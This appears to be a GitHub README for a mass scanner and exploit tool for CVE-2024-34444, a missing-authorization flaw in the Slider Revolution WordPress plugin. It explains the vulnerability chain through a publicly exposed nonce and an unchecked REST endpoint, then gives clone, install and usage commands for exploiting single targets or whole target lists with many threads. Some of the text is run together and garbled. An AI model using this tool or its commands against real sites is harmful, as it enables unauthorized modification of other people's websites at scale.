
Multi-threaded mass scanner for CVE-2024-34444 (Missing Authorization) in Slider Revolution WordPress plugin. Automates nonce extraction, version detection, and exploitation via REST API for unauthenticated slider data modification.
Professional mass scanner for CVE-2024-34444 affecting Slider Revolution WordPress plugin < 6.7.0
Banner
CVE-2024-34444 is a Missing Authorization vulnerability in the Slider Revolution WordPress plugin (versions < 6.7.0). This scanner automates the detection and exploitation of vulnerable installations through the REST API endpoint /wp-json/revslider/v1/slider/save.
Vulnerability Chain:
revslider_actions nonce from frontend (publicly accessible)check_nonce() in REST APIreadme.txt-v) for detailed logging-o) to save resultsgit clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Single target
python3 exploit.py -u https://target.com
# Single target with verbose
python3 exploit.py -u https://target.com -v
# Mass scan from list
python3 exploit.py -l targets.txt -t 20
# Mass scan with output file
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Full example with all options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v